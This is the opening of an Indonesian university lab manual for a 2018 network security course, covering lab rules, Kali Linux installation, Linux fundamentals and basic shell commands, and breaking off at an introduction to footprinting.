Modul Keamanan Jaringan 2018 PDF [PDF]

  • 0 0 0
  • Suka dengan makalah ini dan mengunduhnya? Anda bisa menerbitkan file PDF Anda sendiri secara online secara gratis dalam beberapa menit saja! Sign Up
File loading please wait...
Citation preview

2018 MODUL PRAKTIKUM KEAMANAN JARINGAN



LABORATORIUM FAKULTAS ILMU TERAPAN Hanya dipergunakan di lingkungan Fakultas Ilmu Terapan



UNIVERSITAS TELKOM Keamanan Jaringan | 2018



i



DAFTAR PENGURUS ASISTEN KEAMANAN JARINGAN 2018



Koordinator Dosen Kemanan Jaringan Rohmatulloh, S.T, M.T



Koordinator Asisten Kemanan Jaringan Riki Tanzila R.



Divisi Administrasi : 1. Nata Gayatri



Divisi Praktikum : 1. Ayu Irmawati 2. Jihad Ardiansyah



Divisi Hardware : 1. Gafar Widyo Rizki 2. Hafizal Awi 3. Ivan Hidayah



Keamanan Jaringan | 2018



ii



SURAT PERNYATAAN



Saya yang bertanggung jawab di bawah ini : Nama



: Rohmat Tulloh, S.T., M.T.



NIP



: 06830347-1



Dosen PJMP



: Keamanan Jaringan



Kelompok Keahlian



: Jaringan



Menerangkan dengan sesungguhnya bahwa modul ini telah di review dan akan digunakan untuk pelaksanaan praktikum di Semester Ganjil Tahun Ajaran 2018/2019 di Laboratorium Telecommunication Network Fakultas Ilmu Terapan Universitas Telkom.



Bandung, 17 Agustus 2018 Mengetahui, Ketua Kelompok Keahlian



Dosen PJMP



Sugondo Hadiyoso, S.T., M.T



Rohmat Tulloh, S.T., M.T.



NIP. 13871154-1



NIP. 06830347-1



Keamanan Jaringan | 2018



iii



DAFTAR ISI DAFTAR PENGURUS ....................................................................................................ii SURAT PERNYATAAN ..................................................................................................iii DAFTAR ISI .................................................................................................................iv TATA TERTIB PELAKSANAAN ......................................................................................1 MODUL 0 PENGENALAN DAN INSTALASI KALI LINUX ..................................................3 0.1 Tujuan praktikum ......................................................................................................... 3 0.2 Aplikasi dan OS Yang Digunakan .................................................................................. 3 0.3 Dasar Teori 0.3.1 Pengenalan Kali Linux ......................................................................................... 3 0.3.2 Fitur – Fitur Kali Linux ......................................................................................... 4 0.3.3 Kelebihan dan Kekurangan Kali Linux ................................................................. 5 0.4 Langkah – Langkah Praktikum ..................................................................................... 6 0.4.1 Instalasi Kali Linux di VMWare ........................................................................... 6 MODUL 1 PENGENALAN LINUX UBUNTU, SCANNING DAN FOOTPRINTING 1.1 Tujuan Praktikum .......................................................................................................... 9 1.2 Aplikasi dan OS Yang Digunakan ................................................................................... 9 1.3 Dasar Teori .................................................................................................................... 9 1.3.1 Sejarah Linux ..................................................................................................... 9 1.3.2 Pengenalan Linux .............................................................................................. 10 1.3.3 Fitur Linux.......................................................................................................... 12 1.3.4 Kelebihan dan Kekurangan Linux ...................................................................... 12 1.3.5 Alasan Memilih Distro Ubuntu.......................................................................... 13 1.3.6 Hierarki Dasar Sistem Linux .............................................................................. 13 1.3.7 File Sistem Linux ................................................................................................ 14 1.3.8 Basic Command Linux ....................................................................................... 15 1.3.10 Tahapan Aktivitas Hacking ................................................................................ 19 1.3.11 Protokol Utama Dalam Jaringan Komputer ...................................................... 20 1.3.12 Network Scanning ............................................................................................. 21 1.4 Langkah – Langkah Praktikum ...................................................................................... 22



Keamanan Jaringan | 2018



iv



1.4.1 Setting IP Address Linux Ubuntu ....................................................................... 22 1.4.2 Hal – Hal Yang Harus Dilakukan Setelah Instal Ubuntu .................................... 25 1.4.3 Macam – Macam Teknik Scanning NMAP ....................................................... 25 MODUL 2 ENKRIPSI 2.1 Tujuan Praktikum ......................................................................................................... 29 2.2 Alat Yang Digunakan .................................................................................................... 29 2.3 Dasar Teori ................................................................................................................... 29 2.3.1 Pengertian Enkripsi ........................................................................................... 29 2.3.2 Tujuan Enkripsi .................................................................................................. 30 2.3.3 Jenis – Jenis Enkripsi ......................................................................................... 30 2.4 Langkah – Langkah Praktikum ...................................................................................... 33 MODUL 3 UJI KOMPETENSI PRAKTIKUM 1 3.1 Pengenalan Linux Ubuntu ............................................................................................ 35 3.2 Sacanning and Footprinting ......................................................................................... 35 3.3 Enkripsi ........................................................................................................................ 35 MODUL 4 UJI KOPETENSI TEORI 1 4.1 Pendahuluan Keamanan Jaringan................................................................................ 36 4.2 Etika Hacking ............................................................................................................... 36 4.3 Dasar Keamanan Jaringan ............................................................................................ 36 4.4 Pengenalan Sistem Operasi Open Source .................................................................... 36 4.5 Footprinting dan Scanning ........................................................................................... 37 4.6 Enkripsi ......................................................................................................................... 37 MODUL 5 VIRTUAL PRIVATE NETWORK (VPN) 5.1 Tujuan praktikum .......................................................................................................... 38 5.2 Alat Yang Digunakan ..................................................................................................... 38 5.3 Dasar teori..................................................................................................................... 38 5.3.1 Jenis Implementasi VPN .................................................................................... 38 5.3.2 Protocol VPN ....................................................................................................... 40 5.3.3 Cara Kerja VPN .................................................................................................... 42 5.4 Langkah-langkah Praktikum .......................................................................................... 43



Keamanan Jaringan | 2018



v



5.4.1 Konfigurasi VPN Pada Router Mikrotik (PPTP) .................................................. 43 5.4.2 Pengujian Jaringan VPN .................................................................................... 51 5.4.3 Konfigurasi VPN Pada Mikrotik VMWare (PPTP) ............................................. 52 5.4.4 Menghubungkan Windows Dengan VPN Pada Mikrotik .................................. 54 MODUL 6 FIREWALL AND ACCESS LIST 6.1 Tujuan praktikum .......................................................................................................... 56 6.2 Aplikasi Yang Digunakan ............................................................................................... 56 6.3 Dasar Teori .................................................................................................................... 56 6.3.1 Firewall ........................................................................................................... 56 6.3.2 Access List ....................................................................................................... 56 6.3.3 IPtables ........................................................................................................... 57 6.3.4 Sintaks IPtables ............................................................................................... 59 6.4 Langkah-langkah Praktikum .......................................................................................... 64 6.4.1 Penggunaan Access List .................................................................................. 64 MODUL 7 ATTACKING WEB SERVER 7.1 Tujuan Praktikum .......................................................................................................... 67 7.2 Alat Yang Digunakan ..................................................................................................... 67 7.3 Dasar teori..................................................................................................................... 67 7.3.1 Pengenalan Web Server .................................................................................. 67 7.3.2 Vulnerability .................................................................................................... 69 7.3.3 HTTPS .............................................................................................................. 70 7.3.4 Web Defance................................................................................................... 70 7.3.5 Cross Site Scripting (XSS) ................................................................................ 70 7.3.6 File Inclusion ................................................................................................... 71 7.3.7 SQL Injection ................................................................................................... 71 7.4 Langkah-langkah Praktikum .......................................................................................... 71 7.4.1 SQL Injection ..................................................................................................... 71 MODUL 8 UJI KOPETENSI PRAKTIKUM 2 8.1 Virtual Private Network ................................................................................................ 75 8.2 Firewall dan Access List ................................................................................................. 75



Keamanan Jaringan | 2018



vi



8.3 Attacking Web Server.................................................................................................... 75 MODUL 9 UJI KOMPETENSI TEORI 2 9.1 Virtual Private Network ................................................................................................ 76 9.2 Scanning dan Footprinting ............................................................................................ 76 9.3 Web Security System ..................................................................................................... 76 MODUL 10 METASPLOIT 10.1 Tujuan Praktikum ........................................................................................................ 77 10.2 Alat Yang Digunakan ................................................................................................... 77 10.3 Dasar teori................................................................................................................... 77 10.3.1 Metasploit..................................................................................................... 77 10.3.2 Metasploit Interface ..................................................................................... 78 10.3.3 Modules ........................................................................................................ 80 10.3.4 Meterpreter .................................................................................................. 81 10.3.5 Backdoor ....................................................................................................... 81 10.4 Langkah-langkah Praktikum ........................................................................................ 54 10.4.1 Instalsi Metasploit Pada Ubuntu 12.04 ........................................................ 82 MODUL 11 DIGITAL FORENSIK 11.1 Tujuan Praktikum ........................................................................................................ 87 11.2 Alat Yang Digunakan ................................................................................................... 87 11.3 Dasar teori................................................................................................................... 87 11.3.1 Pendahuluan ................................................................................................. 87 11.3.2 Digital Forensik ............................................................................................. 90 11.3.3 Komponen Digital Forensik........................................................................... 90 11.3.4 Tahapan Pada Digital Forensik ..................................................................... 91 11.3.5 Identifikasi Bukti Digital ................................................................................ 91 11.3.6 Penyimpanan Bukti Digital............................................................................ 93 11.3.7 Analisa Bukti Digital ...................................................................................... 94 11.3.8 Presentasi ..................................................................................................... 95 11.4 Langkah-langkah Praktikum ........................................................................................ 95 11.4.1 Membuat Imager Menggunakan FTK Imager .............................................. 95



Keamanan Jaringan | 2018



vii



11.4.2 Proses Mounting Menggunakan FTK Imager ............................................... 99 MODUL 12 WIRELESS HACKING 12.1 Tujuan Praktikum ........................................................................................................ 103 12.2 Alat Yang Digunakan ................................................................................................... 103 12.3 Dasar teori................................................................................................................... 103 12.3.1 Pengertian Wireless ...................................................................................... 103 12.3.2 WLAN ............................................................................................................ 104 12.3.3 WIFI (Wireless Fidelity) ................................................................................. 104 12.3.4 Keamanan Pada WLAN ................................................................................. 104 12.4 Langkah-langkah Praktikum ........................................................................................ 106 MODUL 13 UJI KOMPETENSI PRAKTIKUM 3 13.1 Metasploit ................................................................................................................... 110 13.2 Pengantar Digital Forensik .......................................................................................... 110 13.3 Wireless Hacking ......................................................................................................... 110 MODUL 14 UJI KOMPETENSI TEORI 3 14.1 System Penetration..................................................................................................... 111 14.2 Pengantar Digital Forensik .......................................................................................... 111 14.3 Wireless Hacking ......................................................................................................... 111 DAFTAR PUSTAKA.......................................................................................................112



Keamanan Jaringan | 2018



viii



TATA TERTIB PELAKSANAAN PRAKTIKUM KEAMANAN JARINGAN 2018 1. Kelengkapan Praktikum Kelengkapan Praktikum Keamanan Jaringan meliputi : modul praktikum, laptop, jurnal praktikum, dan seragam sesuai ketentuan institusi (memakai sepatu dan tidak boleh memakai jeans). Laptop yang digunakan minimal sesuai dengan spesifikasi yang telah ditentukan (RAM 4GB) dan sudah terinstall OS Ubuntu (VMware atau Dualboot). Apabila Laptop praktikan tidak sesuai dengan ketentuan, disarankan untuk menambah RAM atau dapat meminjam laptop temannya dengan ketentuan : - Hanya menggunakan VMware bukan Dualboot. - Tetap menggunakan OS Ubuntu dengan username praktikan sendiri. Bila salah satu dari kelengkapan tersebut tidak terpenuhi, maka praktikan tidak diperbolehkan mengikuti praktikum sebelum syarat yang telah ditentukan tersebut terpenuhi. 2. Pelaksanaan Praktikum a. Praktikan harus hadir pada waktu yang telah ditentukan. b. Praktikan dengan keterlambatan kurang dari 15 menit diizinkan mengikuti praktikum dan mengerjakan tes awal dengan sisa waktu yang ada. c. Praktikan dengan keterlambatan lebih dari 15 menit tidak diizinkan mengikuti praktikum. d. Asisten berhak untuk mengeluarkan praktikan yang dinilai tidak layak selama pelaksanaan praktikum berlangsung. e. Ketidak hadiran yang ditoleransi hanya karena adanya keperluan yang sangat penting dan mendesak, adanya keperluan dalam mewakili institusi dengan bukti surat keterangan dari institusi terkait, dan sakit dengan memberikan surat keterangan dokter (maksimal diberikan ke asisten 72 jam/ 3 hari setelah jadwal praktikum). 3. Larangan bagi Praktikan a. Menggunakan peralatan praktikum tanpa seizing asisten. b. Meninggalkan ruang praktikum tanpa seizin asisten jaga. c. Merokok, makan, minum, dan tidur selama praktikum berlangsung. d. Berprilaku tidak sopan dan tertib terhadap sesama praktikan dan asisten. e. Tidak diperkenankan menyisip, jika hal tersebut terjadi maka praktikan dianggap mendapat nilai NOL dalam modul tersebut.



Keamanan Jaringan | 2018



0



f. Praktikan yang telah menyelesaikan praktikum hanya boleh diizinkan pulang apabila praktikan telah merapihkan kembali peralatan yang digunakan selama praktikumberlangsung dan diberi izin oleh asisten jaga. 4. Komponen Penilaian a. Tugas Pendahuluan • Bersifat optional dan dikerjakan secara individu. • TP keluar setiap Hari Sabtu • Apabila TP tidak dikerjakan, maka nilai TP=0 b. Tes Awal • Tes awal diberikan oleh asisten jaga sebelum praktikum dimulai dengan waktu pengerjaan 15 menit. • Apabila nilai praktikan dari point diatas dirasa kurang maka asisten berhak memberikan tugas tambahan. • Asisten berhak menentukan sifat Tes Awal (lisan atau tulisan) tanpa memberitahukan terlebih dahulu. c. Jurnal • Pengumpulan jurnal praktikum dilakukan setiap akhir praktikum. • Isi jurnal tidak boleh sama, untuk pelanggaran mengenai hal ini akan dikenakan sanksi berupa nilai jurnal dibagi dengan jumlah orang yang memiliki isi jurnal yang sama. • Praktikan yang tidak mengumpulkan jurnal maka tidak akan mendapat nilai jurnal sesuai dengan presentase penilaian jurnal. Persentase Penillaian : Tugas Pendahuluan Tes Awal Jurnal Praktikum



: 15% : 15% : 20% : 50%



5. Lain-Lain a. Pertukaran jadwal praktikum paling lambat 1 hari sebelum praktikum bersangkutan dengan mengisi form tukar jadwal dan disetujui oleh asisten. b. Praktikan wajib menyerahkan form tukar jadwal sebelum pelaksanaan praktikum. c. Praktikan dapat melakukan praktikum susulan maksimal 1 modul. d. Segala bentuk pelanggaran terhadap poin-poin diatas yang dilakukan oleh praktikan akan dikenakan sanksi.



Keamanan Jaringan | 2018



1



e. Tidak ada pemberian tugas tambahan untuk penambahan nilai, oleh karena itu pratikum harus dilakukan dengan sungguh-sungguh, tugas yang dibuat secara asalasalan akan dinilai secara asal-asalan, sanksi cukup berat jadi harap jaga kesehatan. Hal lain yang belum ditetapkan dalam tata tertib ini maka akan ditetapkan kemudian.



Bandung, 17 Agustus 2018 Koordinator Dosen Keamanan Jaringan



Rohmatullah, S.T, M.T



Keamanan Jaringan | 2018



2



MODUL 0 PENGENALAN DAN INSTALASI KALI LINUX 0.1



Tujuan Praktikum 1. Praktikan mengenal sistem operasi Kali Linux. 2. Mengetahui fungsi Kali Linux. 3. Mengerti dan memahami fitur – fitur pada Kali Linux.



0.2



Aplikasi dan OS yang Digunakan 1. VMware 2. Kali Linux



0.3



Dasar Teori 0.3.1 Penjelasan Kali Linux Kali Linux merupakan sebuah Sistem Operasi yang dibangung berbasis Debian yang merupakan distribusi dari induknya, yaitu Linux. Kali Linux sendiri dikembangkan oleh lembaga yang bernama Offensive Security. Bukan dibangun dari dasar, Kali sendiri merupakan development project dari raksasa besar Penetration Tool OS, yaitu BackTrack. Seblum Kali Linux, Backtrack sudah digunakan sebagai alat penetrasi keamanan komputer terbaik yang pernah ada. Walaupun ada juga beberapa OS yang memiliki fungsi yang sama seperti BlackArch, BackBox, dll. Namun BackTrack tetap menjadi yang dipercaya karena kelengkapan alat, fungsionalitas, dan juga efektivitas packing OS yang maksimal. Kali Linux adalah salah satu distribusi Linux tingkat lanjut untuk Penetration Testing dan audit keamanan.Kali juga dikembangkan oleh Offensive Security sebagai penerus BackTrack Linux. Kali menyediakan pengguna dengan mudah akses terhadap koleksi yang besar dan komprehensif untuk alat yang berhubungan dengan keamanan, termasuk port scanner untuk password cracker.



Keamanan Jaringan | 2018



3



0.3.2 Fitur – Fitur Kali Linux Sistem operasi Kali Linux merupakan pengembangan dari sistem operasi BackTrack Linux yang sudah disempurnakan, berikut beberapa fitur Kali Linux yang akan dirangkum dalam beberapa poin, yaitu : •



Gratis seperti pendahulunya, Kali Linux akan selalu gratis dipakai oleh siapapun, dan kapanpun.







Package yang dapat dirubah sepenuhnya Yaitu dapat dirubah isi dari Kali Linux sendiri, seperti tampilan User Interface, package aplikasi, dan lain-lain.







FHS Compliant System Pada FHS Compliant System, untuk menjalankan suatu aplikasi tidak perlu melalui direktori asal, misalnya pada terminal console cukup menuliskan aplikasi apa yang ingin dijalankan.







Lebih dari 300 tool Penetration Tester Tool-tool Penetration Tester seperti Aircrack, Asleap, Bluelog, Bluemaho yang digunakan untuk wireless attack, seperti penyadapan wifi, traffic monitoring, man in the middle, dan lain-lain.







Merupakan yang terbaik untuk hacking dan keamanan Muncul pada saat 2006, Kali Linux dinobatkan menjadi sistem operasi terbaik untuk kebutuhan hacking dan keamanan.







Mempunyai banyak bahasa yang bisa digunakan Meskipun mayoritas petunjuk ditulis dengan bahasa inggris, tetapi pengguna dapat memilih bahasa lain yang sesuai dengan bahasa yang mereka gunakan, seperti Bahasa Indonesia.







Mendukung ARMEL dan ARMHF.







Berjalan pada Kernel Linux 4.0 Berfungsi sebagai task switching, multitasking, melakukan tugas-tugas network serta mengatur penggunaan memori, dengan versi 4.0 merupakan Kernel yang lebih efisien dan lebih terbaru.







Menggunakan desktop Gnome 3, bukan GNOME fallback Keamanan Jaringan | 2018



4



GNOME (GNU Network Model Environment) adalah versi terbaru dari GNOME yang dijalankan pada versi Ubuntu 11.10 yang mana lebih userfriendly dibandingkan dengan GNOME versi sebelumnya. •



In-built screencasting tool Pada versi BackTrack tidak ada fitur ini, fitur ini dapat digunakan untuk merekam desktop, sehingga tidak perlu rumit untuk merekam apa yang ditampilkan di desktop dan repot-repot mencari tool yang lain.







Dukungan Ruby 2.0 Dengan dukungan Ruby 2.0, membuat Metasploit memuat lebih cepat.







Dukungan perangkat yang luas Kompatibilitas terhadap perangkat-perangkat eksternal seperti SSD (SolidState Drive), USB (Universal Serial Bus), Keyboard eksternal, dan lain-lain.



0.3.3 Kelebihan dan Kekurangan Kali Linux Kelebihan dari Kali Linux : 1. Stremaing Security serta update package dari repositori Debian Sinkronisasi dengan repositori Debian 4 kali sehari, terus memberikan Anda dengan update paket terbaru dan perbaikan keamanan yang tersedia. 2. Packaging file Debian dari masing-masing tool di kali Jadi tools di Kali linux bisa di gunakan oleh distro yang lain yang masih turunan dari linux Debian, seperti Ubuntu, Blankon, dll. 3. Pemaketan/packaging jangka panjang & sering maintenance pada bug di tools-nya 4. Bisa menggunakan banyak desktop evironment misal KDE, LXDE, XFCE 5. Kemudahan update untuk versi kali linux terbaru 6. Support jangka panjang pada pengembangan jangka panjang pada ARM Hardware 7. Automatis Instalasi pada Kali. 8. Kustomisasi ISO & Boostraps.



Keamanan Jaringan | 2018



5



Dan masih banyak yang lain , tetapi pada dasarnya Kali Linux adalah distro versi 6 dari Backtrack hanya saja di rubah namanya jadi asti akan ada kelebihan yang di berikan . Dari kelebihan ini, yang paling mencolok yaitu adanya support yang kuat dari Debian.



Kekurangan kali Linux: 1. Sistem operasi Kali Linux sulit untuk dipelajari, terutama yang belum mempunyai kemampuan komputer sama sekali. 2. Belum banyak aplikasi yang mendukung Linux 3. Tampilan dari sistem operasi ini kurang menarik 4. Tidak banyak dukungan dari hardware tertentu.



0.4



Langkah – Langkah Praktikum 0.4.1 Intalasi Kali Linux di VMWare 1.



Download Kali Linux terlebih dahulu.



2.



Lalu buka VMWare, dan buat new virtual machine.



Keamanan Jaringan | 2018



6



3. Lalu klik Power on this virtual machine. Maka akan masuk ke tampilan utama instal kali linux



4. Masukkan username : root dan password : toor



Keamanan Jaringan | 2018



7



5. Tunggu proses instalasi sampai selesai dan Kali Linux sudah dapat di gunakan.



Keamanan Jaringan | 2018



8



MODUL 1 PENGENALAN LINUX UBUNTU, SCANNING DAN FOOTPRINTING



1.1



Tujuan Praktikum 1. Memberikan pengetahuan singkat tentang asal-usul Linux. 2. Praktikan mengenal sistem operasi Linux. 3. Mengetahui perintah dasar Linux dan fungsinya. 4. Mengerti tentang file hirarki sistem (FHS). 5. Mahasiswa mengenal dan memahami konsep foot printing 6. Mahasiswa mengenal dan memahami konsep network scanning 7. Mahasiswa dapat melakukan dasar network scanning menggunakan nmap



1.2



1.3



Aplikasi dan OS yang Digunakan 1.



VMware



2.



OS Linux Ubuntu 12.04



3.



Nmap sebagai komputer server



4.



Windows 7 sebagai komputer target



Dasar Teori 1.3.1 Sejarah Linux Kernel linux pada mulanya berasal dari proyek hobi mahasiswa Universitas Helsinki di Finlandia, bernama Linus Torvalds. Bermula dari ketidak puasan Linus terhadap kernel Minix yang dipakai di kampusnya. Orang yang mempublikasikan Linux di Indonesia adalah Paulus Suryono Adisoemarta (Bung Yono). Tahun 1992-1994 adalah masa vakum perkembangan Linux. Masuknya Distro Slackware (Kernel 1.0.8) ke Indonesia memicu tumbuhnya komunitas GNU/LINUX di lingkungan Universitas Indonesia.



Keamanan Jaringan | 2018



9



1.3.2 Pengenalan Linux Linux adalah sistem operasi komputer yang bertipe Unix. Linux merupakan salah satu contoh hasil pengembangan perangkat lunak bebas dan sumber terbuka utama. Seperti perangkat lunak dan sumber terbuka lainnya pada umumnya, kode sumber Linux dapat dimodifikasi, digunakan dan didistribusikan kembali secara bebas oleh siapa saja. Linux memiliki lisensi General Public License (GNU). GNU merupakan lisensi copyleft bebas untuk perangkat lunak yang menjamin kebebasan untuk mendistribusikan dan mengubah semua versi dari sebuah program, memperoleh kode sumber dari program tersebut, menggunakan sebagian program untuk membuat program baru dengan syarat kode program yang asli harus disertakan. Linux bersifat terbuka (open source) siapapun individu dapat memaketkan linux dengan piranti lunak pilihannya dengan cara pemaketan masing- masing untuk membuat distro sesuai dengan tujuannya. Beberapa jenis distro linux baru beserta contoh distro turunannya yaitu : 1. Debian,



mengutamakan



kestabilan



dan



kehandalan



meskipun



mengorbankan aspek kemudahan dan kemutakhiran program. Debian menggunakan *.deb dalam paket instalasi programnya. Distro turunannya : Debian, Ubuntu dan turunannya, gOS Linux, Dream Linux, Linux Mint, Xandros, BlankON Linux, Dewalinux, dll.



Gambar 1.1 Debian 2. RedHat, merupakan distro pertama yang instalasi dan pengoperasiannya mudah. Distro berbasis RedHat menggunakan binary RPM (redhat package management).Contoh distro dari varian ini adalah RedHat, Mandrake, Mandriva,PCLinuxOS, centOS, Fedora,Core,IGOS, dll.



Keamanan Jaringan | 2018



10



Gambar 1.2 Redhat 3. Slackware, bisa dikatakan Linux untuk advanced, hampir semua dokumentasi linux disusun berdasarkan slackware. Semua isinya (kernel, library ataupun aplikasinya) sudah teruji. Slackware menganjurkan untuk menginstall dari source sehingga setiap program yang diinstall teroptimasi dengan sistem kita. Slackware menggunakan libc5 dalam binary/librarynya dan filenya menggunakan .tgz. Contoh distro : Slackware, Slax, Zenwalk, Vektor Linux, Backtrack, KateOS, Puppy Linux dll.



Gambar 1.3 Slackware 4. SuSE distribusi dari YaST (Yet another Setup Tools) untuk mengkonfigurasi sistem merupakan distribusi linux yang penginstallannya menggunakan bahasa indonesia. Contoh distro : SuSE Linux Enterprise, OpenSuSE, dll.



Gambar 1.4 SuSE 5. Ubuntu adalah salah satu distribusi Linux yang berbasiskan pada Debian dan memiliki interface desktop. Proyek Ubuntu disponsori oleh Canonical Ltd (perusahaan milik Mark Shuttleworth). Ubuntu adalah sistem operasi lengkap berbasis Linux, tersedia secara bebas dan mempunyai dukungan baik yang berasal dari komunitas maupun tenaga ahli profesional.



Keamanan Jaringan | 2018



11



Gambar 1.5 Ubuntu 6. BSD , beberapa distro BSD dikembangkan berdasarkan source code yang dikenal sebagai 4,4BSD-Lite. Contoh distro: FreeBSD,OpenBSD, netBSD, DragonflyBSD, PcBSD.



Gambar 1.6 BSD



1.3.3 Fitur Linux Fitur dasar Linux yang perlu diketahui, antara lain : 1. Multi Tasking dan dukungan 32 dan 64 bit mampu menjalankan beberapa perintah bersamaan. 2. Multi User atau Multi Session, user dapat login bersamaan . Sistem filenya mempunyai keamanan yang ketat, dan dapat dimodifikasi secara optimal. 3. Virtual memory, Linux menggunakan sebagian dari harddisk dan memperlakukannya seperti memory. 4. Networking, Linux menggunakan protocol TCP/IP, termasuk Network File System, Network Information Service, Session Message Block, dll.



1.3.4 Kelebihan dan Kekurangan Linux Kelebihan Linux : 1. Linux didapatkan secara bebas tanpa membayar lisensi. 2. Keamanan Linux lebih unggul daripada windows. 3. Linux lebih aman terhadap virus , karena selain jumlah virus di Linux sangat minim sekali. Linux aman dan tangguh untuk jaringan.



Keamanan Jaringan | 2018



12



Kekurangan Linux : 1. Kurangnya dukungan perangkat keras dari vendor tertentu. 2. Tidak user friendly, karena kebanyakan pengguna merasa kebingunan saat menggunakan OS ubuntu. 1.3.5 Alasan Memilih Distro Ubuntu 1. Distribusi Linux yang paling User Friendly. 2. Teknologinya dibawah pengawasan Perusahaan Canonical dan Ubuntu Community (Komunitas Linux Terbesar) sehingga terjamin untuk pengembangannya ke depan. 3. Package Management yang paling stabil. 4. Sangat cocok untuk pengguna PC Desktop dan Laptop. 5. Rekomendasi bagi pemula yang ingin belajar System Linux. 6. Freedom and Free. 1.3.6 Hierarki Dasar Sistem Linux Linux mempunyai sistem hirarki yang diturunkan dari sistem operasi UNIX. Directory yang berada paling ujung atau paling dasar yaitu /(root). Di bawah direktori root (/), ada beberapa kumpulan direktori sistem penting yang umum digunakan oleh banyak distribusi Linux lainnya. Di bawah ini adalah daftar dari direktori umum yang berada tepat di bawah direktori root (/) : 1. /bin – aplikasi biner penting 2. /boot – lokasi berkas konfigurasi untuk boot. 3. /dev – berkas peranti (device) 4. /etc – berkas konfigurasi, skrip startup, dll. 5. /home – direktori pangkal (home) untuk pengguna 6. /lib – libraries yang diperlukan oleh sistem 7. /lost+found – menyediakan sistem lost+found untuk berkas yang berada dibawah direktori root (/) 8. /media – mount (memuat) removable media seperti CD-ROM, kamera digital. 9. /mnt – untuk me-mount sistem berkas



Keamanan Jaringan | 2018



13



10. /opt – tempat lokasi untuk menginstal aplikasi tambahan (optional) 11. /proc – direktori dinamis khusus yang menangani informasi mengenai kondisi sistem, termasuk proses-proses (processes) yang sedang berjalan 12. /root – direktori pangkal untuk root, diucapkan ‘slash-root’ 13. /sbin – sistem biner penting 14. /sys – mengandung informasi mengenai system 15. /tmp – berkas sementara (temporary) 16. /usr – tempat aplikasi dan berkas yang sering digunakan oleh pengguna (users) 17. /var – berkas variabel seperti log dan database



Hirarki sistem berkas diatas merupakan sistem berkas dasar yang ada pada sebagian distro yang beredar. Pada distro lain mungkin terjadi perbedaan. Tetapi pada dasarnya sama yaitu memiliki/ sebagai akarnya. Pada sistem berkas tersebut, sub directori dapat berada pada harddisk yang berbeda. Berbeda dengan windows yang menggunakan backslash (\) sebagai pembatas directory dengan directory atasnya atau bawahnya. Linux menggunakan slash (/) sebagai pembatasnya. Misalnya pada windows C:\Program Files\Open Office\. Sedangkan pada linux \home\bayu\file data\. Pada windows dikenal drive C: D: dan seterusnya, maka pada linux drives tersebut di masukkan dalam directory /mnt dan /media untuk CDROM dan media external lainnya. Tetapi pada distro distro dapat memiliki aturan yang berbeda.



1.3.7 File Sistem Linux 1. Ext2 Second Extended File System (Ext2) dirancang oleh Remy card, sebagai file system yang axtensible dan powerful untuk digunakan pada sistem operasi Linux. Ext2 pertama kali dikembangkan dan diintregasikan pada kernel Linux. Kemampuan dasar Ext2 : 1. Mampu meyokong beberapa tipe file standar dari UNIX.



Keamanan Jaringan | 2018



14



2. Mampu menghasilkan nama-nama file yang panjang. Maximum 225 karakter. 3. Memerlukan beberapa blok untuk super user (root).



2. Ext3 Ext3 merupakan jurnalled filesystem yang didesain untuk melindungi data yang ada di dalamnya. Sehingga tidak perlu lagi nutuk melakukan pengecekan konsistensian data, yang akan memakan waktu yang sangat lama bagi harddisk yang berkapasitas besar.



3. Ext4 File sistem yang satu ini dirilis secara komplit dan stabil berawal dari kernel 2.6.28 jadi apabila distro anda yang secara default memiliki versi kernel tersebut atau diatasnya, maka secara otomatis system anda telah support Ext4.



Keuntungan menggunakan file system ini adalah mempunyai pengalamatan 48-bit blok yang artinya dia akan mempunyai 1EB = 1.048.576 Tb ukuran maksimum filesystem dengan 16 Tb untuk maksimum file size-nya, Fast fsck, Journal checksumming, Defragmentaticion Support.



1.3.8 Basic Command Linux 1. Sudo Su Digunakan untuk login sebagai root/pengguna tertinggi # sudo su # password 2. Login Digunakan untuk login sebagai user lain, namun harus menjadi root dulu # login namauser 3. Cd Digunakan untuk berpindah direktori # cd alamat_direktori



Keamanan Jaringan | 2018



15



# cd /var/www 4. Pwd Digunakan untuk memperlihatkan di direktori mana posisi kita berada sekarang. # pwd 5. Ls Digunakan untuk melihat isi sebuah direktori. # ls 6. Cp Digunakan untuk melakukan copy file. # cp /direktori/fileyangingindicopy /direktori tujuan 7. Mv Digunakan untuk melakukan memindahkan, cut atau rename file # mv /direktori/fileyangingindicut /direktori tujuan (cut) # mv /direktori/file_yang_ingin_direname /nama_baru_file (rename) 8. Mkdir Digunakan untuk membuat folder baru # mkdir namafolder 9. Rmdir Digunakan untuk menghapus folder. # rm -r namafolder 10. Touch Digunakan untuk membuat file baru. # touch nama_file 11. Rm Digunakan untuk menghapus file. # rm nama_file 12. More Digunakan untuk menampilkan isi sebuah file # more nama_file 13. Echo



Keamanan Jaringan | 2018



16



Digunakan untuk menuliskan sesuatu kata atau kalimat ke sebuah file. # echo “isi pesan” nama_file 14. Adduser Digunakan untuk menambah user baru # adduser nama_user 15. Addgroup Digunakan untuk menambah group baru # addgroup nama_group 16. Lsusb Digunakan untuk melihat perangkat usb yang sedang terkoneksi ke computer # lsusb 17. Lshw Digunakan untuk melihat hardware computer # lshw 18. Dmesg Digunakan untuk melihat hardware yang sedang beraktifitas # dmseg 19. Top Digunakan untuk Melihat proses yang berjalan, seperti Task Manager Windows # top 20. Cpuinfo Digunakan untuk melihat spesifikasi komputer. # more /proc/cpuinfo 21. Halt Digunakan untuk mematikan komputer, namun harus sebagai root. 22. Reboot Digunakan untuk merestart komputer, namun harus sebagai root. 23. Wget Digunakan untuk mendownload via terminal



Keamanan Jaringan | 2018



17



# wget link_download 24. Ifconfig Digunakan untuk melihat konfigurasi ethernet/kartu jaringan. 25. apt-get Digunakan untuk memperoleh paket/software dari repository ubuntu secara online. # apt-get nama_paket 26. tar Digunakan untuk melakukan extract file. # tar [parameter] nama_file 27. who digunakan untuk melihat nama login kita. 28. Cat Digunakan untuk membuka file 29. hostname Menampilkan nama komputer. 30. History Melihat perintah apa saja yang pernah diketik 31. Deluser Menghapus user dari system #



deluser [nama user]



1.3.9 Pengertian Foot Printing “Foot printing proses untuk mengumpulkan dan akumulasi data demi tujuan tertentu pada lingkup jaringan komputer biasanya digunakan untuk mencari jalan masuk ke sebuah sIstem untuk mengeksploitasi sistem tersebut.” (Rouse, 2007). “Metodologi pengumpulan data (Information Gathering) dalam sertifikasi CEH dibagi menjadi 7 tahap yaitu : 1.



Menggali informasi awal •



Mendapatkan informasi website resmiWebsite resmi perusahaan



Keamanan Jaringan | 2018



18



